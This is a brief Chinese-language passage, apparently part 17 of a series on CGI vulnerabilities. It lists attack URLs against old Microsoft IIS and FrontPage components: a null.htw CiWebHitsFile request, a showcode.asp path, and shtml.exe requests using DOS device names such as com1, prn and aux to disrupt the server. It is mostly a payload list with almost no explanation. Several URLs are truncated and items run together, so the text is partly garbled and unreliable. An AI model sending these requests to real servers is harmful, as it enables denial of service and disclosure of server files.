CGI漏洞(17) http://www.xxx.com/null.htw?CiWebHitsFile=...HiliteType=Full 三十一.showcode.asphttp://www.someserver.com/msadc/ ... LECTOR/showcode.asp
三十二.SHTML.EXE 利用这个漏洞通过 FrontPage Server Extensions 的 shtml.exe 请求一URL,并且 URL 后要包含一个.htm extension 的 DOS 设备名。http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe/...ything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_vti_bin/shtml.exe/com1 http://www.example.com/_vti_bin/shtml.exe/prn